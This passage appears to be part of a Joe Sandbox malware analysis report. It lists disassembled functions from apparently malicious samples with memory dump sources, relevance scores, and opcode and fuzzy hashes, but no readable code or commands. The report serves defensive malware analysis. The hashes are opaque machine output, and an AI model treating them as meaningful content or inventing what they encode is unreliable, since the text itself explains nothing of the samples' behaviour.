                                                                                                                        • Opcode ID: ceacc6a1d2969a0ed113f2c93ff53337976e7b89bff1e6c6e49c18ff442bac7c
                                                                                                                        • Instruction ID: 5088a557014a2691414aee4e9cb9125f1d1c1ecbe839ebd8b86ff3c9b2c0d359
                                                                                                                        • Opcode Fuzzy Hash: ceacc6a1d2969a0ed113f2c93ff53337976e7b89bff1e6c6e49c18ff442bac7c
                                                                                                                        • Instruction Fuzzy Hash: 8DF0963144F2C99FD7229BB088614E97FA4AF43214F1940FAE446CB0F2D56C171AD762
                                                                                                                        Function 00007FFD9BBE1CD2 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6af18d519309fa4ac7df8e1e70f91c0dfe4245268e179a427ab31b826f0b4f1
                                                                                                                        • Instruction ID: 362a4984c5a226499758cc8378b46ee8ff83162ce2da17dc25b07a91074b4dd3
                                                                                                                        • Opcode Fuzzy Hash: b6af18d519309fa4ac7df8e1e70f91c0dfe4245268e179a427ab31b826f0b4f1
                                                                                                                        • Instruction Fuzzy Hash: EBF0963154E3C99FD322DBB0C8218E53FB4AF47214B2600F6E445CB0B2D56C571AC752
                                                                                                                        Function 00007FFD9BBE1993 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                                                                        • Instruction ID: d6e7e0e91077c5b0df9496bc35fff18d38750f4fd0a92f42b71051129a602261
                                                                                                                        • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                                                                                        • Instruction Fuzzy Hash: B6010474A1992C8FDFA8DB48C854FA8B7B1FB68305F1041D9800DE36A0CB719A84CF41
                                                                                                                        Function 00007FFD9B7D3A12 Relevance: .0, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 77b38030535d79f956eb93a92873d18ff117e95818826e88958fd7caf39311ee
                                                                                                                        • Instruction ID: 29360c8619621cdb990a2f40faf68843e5c6fc4b3bc0a84ee0c7352782a6c1aa
                                                                                                                        • Opcode Fuzzy Hash: 77b38030535d79f956eb93a92873d18ff117e95818826e88958fd7caf39311ee
                                                                                                                        • Instruction Fuzzy Hash: CDF09621B0D60D4BEAB4E644C864BB83392EFC4355F1313B9D44EC31B2DD286A868510
                                                                                                                        Function 00007FFD9BBE84D8 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 663585fd4f8ffebae59cf5f245eb41528352dc3d46f7425ee9498fcaa94c02cd
                                                                                                                        • Instruction ID: 6f252ac22bab6003d57c12bef34e2a6abadd6c01bbb0ecaea0be0eb3dda3e39b
                                                                                                                        • Opcode Fuzzy Hash: 663585fd4f8ffebae59cf5f245eb41528352dc3d46f7425ee9498fcaa94c02cd
                                                                                                                        • Instruction Fuzzy Hash: 5CF08261B1ED4E8EFB35599478312B92A10FF41318F26007AC94E861F6CA19A702A3D3
                                                                                                                        Function 00007FFD9B7D0B95 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                                                                        • Instruction ID: 378757b219dcafe17c7169d26e0421f482686a2474ed2937262bc679545b8f89
                                                                                                                        • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                                                                        • Instruction Fuzzy Hash: FBD0A73061954E4FEA01F778D8899547B90EF5F210BDA14E1D008C7171D5048955CB00
                                                                                                                        Function 00007FFD9BBE29C7 Relevance: .0, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e3c3a20fbeb3818bbd06dc5cdc9e3ab4d85a0700c0ff0f2f0c0adaf4beb1ec3
                                                                                                                        • Instruction ID: 887b5515a8ed0ca55acd25ae0fef0614d55ee45b156f4194fbef04dc650532a3
                                                                                                                        • Opcode Fuzzy Hash: 0e3c3a20fbeb3818bbd06dc5cdc9e3ab4d85a0700c0ff0f2f0c0adaf4beb1ec3
                                                                                                                        • Instruction Fuzzy Hash: 69D02B41F0E38E0BF73505F0087103C19809F17344B071176D14A892F3DCC8690163A3
                                                                                                                        Function 00007FFD9BBEC8B7 Relevance: .0, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4fda24def7547b8f86966095fefb770cf97bef7aeab9d28c300466b6573a38eb
                                                                                                                        • Instruction ID: 9997314a3f281f54a77011e0b49a060d8f75f13536d0a6dfb5ada08d7dbd0a16
                                                                                                                        • Opcode Fuzzy Hash: 4fda24def7547b8f86966095fefb770cf97bef7aeab9d28c300466b6573a38eb
                                                                                                                        • Instruction Fuzzy Hash: 30D05B42F4F38E5BE73605E049754B81AC49F573447470476D155892F3D9886A449363
                                                                                                                        Function 00007FFD9BBE79F7 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 764234fe5b416fbd79743897ff2d123f4faa9f46bf3fea585e5097da6b4c50b3
                                                                                                                        • Instruction ID: d058521dc69913cabb88b98574debf7175bc7b61eaa8dda6c0205466a83765b9
                                                                                                                        • Opcode Fuzzy Hash: 764234fe5b416fbd79743897ff2d123f4faa9f46bf3fea585e5097da6b4c50b3
                                                                                                                        • Instruction Fuzzy Hash: 34D05B83F1F7CA1BEB3605A108750640B946F1734470B04B5D1478A3F3DC883B0543A2
                                                                                                                        Function 00007FFD9B7D06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 019da93b2df27518548db9b55e9e9aa204c9959e667c970efe97f9235080dc16
                                                                                                                        • Instruction ID: ecd9ad8d82530becad0801c3f83ab09ac2e8cdd28a5fb5f12ada5059cbcbfaef
                                                                                                                        • Opcode Fuzzy Hash: 019da93b2df27518548db9b55e9e9aa204c9959e667c970efe97f9235080dc16
                                                                                                                        • Instruction Fuzzy Hash: F1C08C04F0B70F00F83035EE14360ACB1009BC4A90FD32372C00E400F19C0E22CD814A
                                                                                                                        Function 00007FFD9B7D0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                                                                        • Instruction ID: 139fe28c14f4a20228704eb81ccb99aed2a3b17b8865ce8d91ab3bce1d9df8f6
                                                                                                                        • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                                                                        • Instruction Fuzzy Hash: 0EC08C305118088FCA00EB2CC884A0036A0FB0E210BC30290E00DC7170E21ADC84C700
                                                                                                                        Function 00007FFD9B7D12B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cb3fb26588337ea5b06e2053518f9ffafbe25df1786e3f2ae4e68c2d5c73d5fd
                                                                                                                        • Instruction ID: 207ad6074ed041447629969215b9f626c85e88611dfffe9a7d1e620d03f1c1f2
                                                                                                                        • Opcode Fuzzy Hash: cb3fb26588337ea5b06e2053518f9ffafbe25df1786e3f2ae4e68c2d5c73d5fd
                                                                                                                        • Instruction Fuzzy Hash: 28C08C3061180C8FCA08EB38C88480433A0FF09200BC20190E408C7170D619DCC5CB40
                                                                                                                        Function 00007FFD9BBE34AB Relevance: .0, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c46bc6eb28f12049a0d14629c5b8016acc92047b6a18febb169eeafeeaeb384c
                                                                                                                        • Instruction ID: a964a5d0d37cff3ffd8900771094fbbbf89324dfa9fd4e072b5fd1eb6dd1027b
                                                                                                                        • Opcode Fuzzy Hash: c46bc6eb28f12049a0d14629c5b8016acc92047b6a18febb169eeafeeaeb384c
                                                                                                                        • Instruction Fuzzy Hash: DBD09210B0E54F89F23B56D1413023A51A16F45709FAA0039D05F41AF18E1CB60162A3
                                                                                                                        Function 00007FFD9B7D4838 Relevance: .0, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c0faf6f761710772d70c66a14b131621bc7811e5901c7fa68584305191cf8248
                                                                                                                        • Instruction ID: 6d0c7d341adb06ca713cbe8542618d6a6c64a5e15a4d54a2bb5f76e7f3b1f391
                                                                                                                        • Opcode Fuzzy Hash: c0faf6f761710772d70c66a14b131621bc7811e5901c7fa68584305191cf8248
                                                                                                                        • Instruction Fuzzy Hash: DFC04C01F18D5A07F259A218643177EA8425F84608F9606B5E11ECABDECD1C6A0212CB
                                                                                                                        Function 00007FFD9B7D06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: df222be522c201a1275ca7ecf03bd2f1815817b6ce0967f16c8cf6fa3dfcd97a
                                                                                                                        • Instruction ID: 2c742935b29f8f0af5c12381d0df753ef15c5014593c6107b6dbe552d346928b
                                                                                                                        • Opcode Fuzzy Hash: df222be522c201a1275ca7ecf03bd2f1815817b6ce0967f16c8cf6fa3dfcd97a
                                                                                                                        • Instruction Fuzzy Hash: 38B01204E5750F00E86431FA086606470409BC4140FC213B0D40D401B1984D129C0242
                                                                                                                        Function 00007FFD9BBEBE4C Relevance: .0, Instructions: 8COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                                                                                        • Instruction ID: fefc27b50bd7a6eba0030549615b85263e569d7540557f968848ae48ecae07f3
                                                                                                                        • Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                                                                                        • Instruction Fuzzy Hash: DFC04C7071A409CFE6A0DB58C154E2836A1FF44304B6200B4E10DCB1F5DA24ED019755

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FFD9BA20D4F Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3002432815.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9ba20000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 5X_H
                                                                                                                        • API String ID: 0-3241812158
                                                                                                                        • Opcode ID: 8d4ce71a311d88f35558c6b77b03d48718fb6f485d519acb4da97691160b3b39
                                                                                                                        • Instruction ID: cde888c91920ff566b466afdd4c40b652f6648fa286319dea043bf00d1c1527e
                                                                                                                        • Opcode Fuzzy Hash: 8d4ce71a311d88f35558c6b77b03d48718fb6f485d519acb4da97691160b3b39
                                                                                                                        • Instruction Fuzzy Hash: 30910271A19A8E4FEB99DB6C88657A87FE1FF65300F4101BAD04AC72E6CBB91905C740
                                                                                                                        Function 00007FFD9BE320DB Relevance: .9, Instructions: 852COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 632ffaf10840d3dec47ad9f303d3c67c2933448447406496068c6ab42059db33
                                                                                                                        • Instruction ID: 8a9346b31275f1d37084a8eaacc756aa40b0376558fd7d87169190601c1733c6
                                                                                                                        • Opcode Fuzzy Hash: 632ffaf10840d3dec47ad9f303d3c67c2933448447406496068c6ab42059db33
                                                                                                                        • Instruction Fuzzy Hash: 8B523A30B0D60D8FDBA8DB98C865AB877E5FF45350F1141B9D08EC71A2DA26ED46CB81
                                                                                                                        Function 00007FFD9BE3947F Relevance: .6, Instructions: 592COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 212b4a55019d432ec99674d5d99056dd7ca5c794ac3c68dd6d4f8be4ba7db248
                                                                                                                        • Instruction ID: e90c06aa0ac0459e6a9d9e14a654fe82a0f6595370a2768cf03e32467548aa45
                                                                                                                        • Opcode Fuzzy Hash: 212b4a55019d432ec99674d5d99056dd7ca5c794ac3c68dd6d4f8be4ba7db248
                                                                                                                        • Instruction Fuzzy Hash: 6C22E334E1964E8FEB68CF58C4A86B877A5FF54300F1141BED45BD7296CB39AA81CB40
                                                                                                                        Function 00007FFD9BA20E43 Relevance: .2, Instructions: 171COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3002432815.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9ba20000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f77a637e67d99d06e3e067a05a419bdae95ad2e59efb8b75a5e24627b100af82
                                                                                                                        • Instruction ID: a27b7394c20197c87277ae75bde0f13c6b591ffaf3aaebe79ce947675c0b9ba0
                                                                                                                        • Opcode Fuzzy Hash: f77a637e67d99d06e3e067a05a419bdae95ad2e59efb8b75a5e24627b100af82
                                                                                                                        • Instruction Fuzzy Hash: 9651DF72B1894A8EE7A8DB5C88A6BB87FE1EB99310F5101BED10EC37D5CBB51911C740
                                                                                                                        Function 00007FFD9BE33AF2 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: _H
                                                                                                                        • API String ID: 0-1676414105
                                                                                                                        • Opcode ID: da0ac2ba25fd6a9a79dca7aba8d08001c597ef0212c647efad950289dbe0000c
                                                                                                                        • Instruction ID: 2279d0172f9500da05c135ed6918dd0501bf3bba89e20e6e76e2c7cb9233a037
                                                                                                                        • Opcode Fuzzy Hash: da0ac2ba25fd6a9a79dca7aba8d08001c597ef0212c647efad950289dbe0000c
                                                                                                                        • Instruction Fuzzy Hash: 7EC1E470B0AA4B5FE75ADB68C0A0AA4B7A5FF54300F554179C04EC7A97CB29F951C780
                                                                                                                        Function 00007FFD9BE38FF8 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 4960acdcb7ca7efa437012c68777510fbbb1f3d1f295b52776e9b31fe093ce4d
                                                                                                                        • Instruction ID: 641e0b30d94b32a93a15059f46e11b7c0dd67c996928c5b9e719630ababbf43d
                                                                                                                        • Opcode Fuzzy Hash: 4960acdcb7ca7efa437012c68777510fbbb1f3d1f295b52776e9b31fe093ce4d
                                                                                                                        • Instruction Fuzzy Hash: 0F516B35E0954E9FDB69DB98C8645BDB7B1FF44300F1241BAD01AE72A6DB3A6A01CB40
                                                                                                                        Function 00007FFD9BE33FC8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: c03736a8bac38c9768f32f2fa08b1d7775ba8341c8c2f595b5453e19ce9c878e
                                                                                                                        • Instruction ID: 830a5d87c0d02f136d3df3a3a35bdd406d28b8b47a73e77fe6a5571ae07f1dd3
                                                                                                                        • Opcode Fuzzy Hash: c03736a8bac38c9768f32f2fa08b1d7775ba8341c8c2f595b5453e19ce9c878e
                                                                                                                        • Instruction Fuzzy Hash: 30515C71F0954E8FDB69DB98C4A15FDB7B1EF54300F1141BEC01AE72A6CA3A6A01CB41
                                                                                                                        Function 00007FFD9BE3DEB8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: e33e5f42da694ceedb93f96b1e99a9c656ce044d3db8de245f88f705dea38631
                                                                                                                        • Instruction ID: d7e25fb5031fc7d20628332a8f8feefe3c36d5c7d9dfaf2de3b2ef2daddff4cc
                                                                                                                        • Opcode Fuzzy Hash: e33e5f42da694ceedb93f96b1e99a9c656ce044d3db8de245f88f705dea38631
                                                                                                                        • Instruction Fuzzy Hash: 1A515D71E1A54E8FDB69DB98C4A05FDBBB1FF54300F1140BAD01AE72A6CA366A05CB50
                                                                                                                        Function 00007FFD9BE3A2B1 Relevance: .4, Instructions: 405COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d21928304fc6bd36b6b63cedeac9fba63faab64104b10bc21031fc437b2d822f
                                                                                                                        • Instruction ID: be2b992c294f381d5936ee6cd0da4005fffc63589eb14ae041f0a99b86b3adda
                                                                                                                        • Opcode Fuzzy Hash: d21928304fc6bd36b6b63cedeac9fba63faab64104b10bc21031fc437b2d822f
                                                                                                                        • Instruction Fuzzy Hash: CBD1E630A0EB4E8FD378DB68D4A457977E5FF44300B15657DC48AC36A2DE2BB9828B41
                                                                                                                        Function 00007FFD9BE352A7 Relevance: .4, Instructions: 394COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8868da03f1c7698e2a0e9f8bedad02fdd37e21b3cf5059114ca5b357449683ff
                                                                                                                        • Instruction ID: f34936dd0ace29262b1bc7a99021e889e3ac2f74e03608d64c9c6a65fa45fe02
                                                                                                                        • Opcode Fuzzy Hash: 8868da03f1c7698e2a0e9f8bedad02fdd37e21b3cf5059114ca5b357449683ff
                                                                                                                        • Instruction Fuzzy Hash: 70D11630B1EB4A8FE379DB68D4A147577E5FF44301B1505BEC48BC36A2DA2AB9428B41
                                                                                                                        Function 00007FFD9BE3CF16 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3007687202.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_7ffd9be30000_yeeQesPXxpnDuwPWqTnUoVbi.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd000f1ec0058bb8882392b0932478d70464a9fadba162e1050c07976b06272b
                                                                                                                        • Instruction ID: a51fbcbd44d5e49fab4ee2f3d4cb61290e319418e2dce5d14c1e8d6d77bec322
                                                                                                                        • Opcode Fuzzy Hash: bd000f1ec0058bb8882392b0932478d70464a9fadba162e1050c07976b06272b
                                                                                                                        • Instruction Fuzzy Hash: F2A16B31F0EB4E4FE375AB6894215B5B7E5EF41310B1645BFD48EC32A3CA2AB9028741
                                                                                                                        Function 00007FFD9BE3DA4E Relevance: .3, Instructions: 292COMMON
                                                                                                                        Download Yara Rule
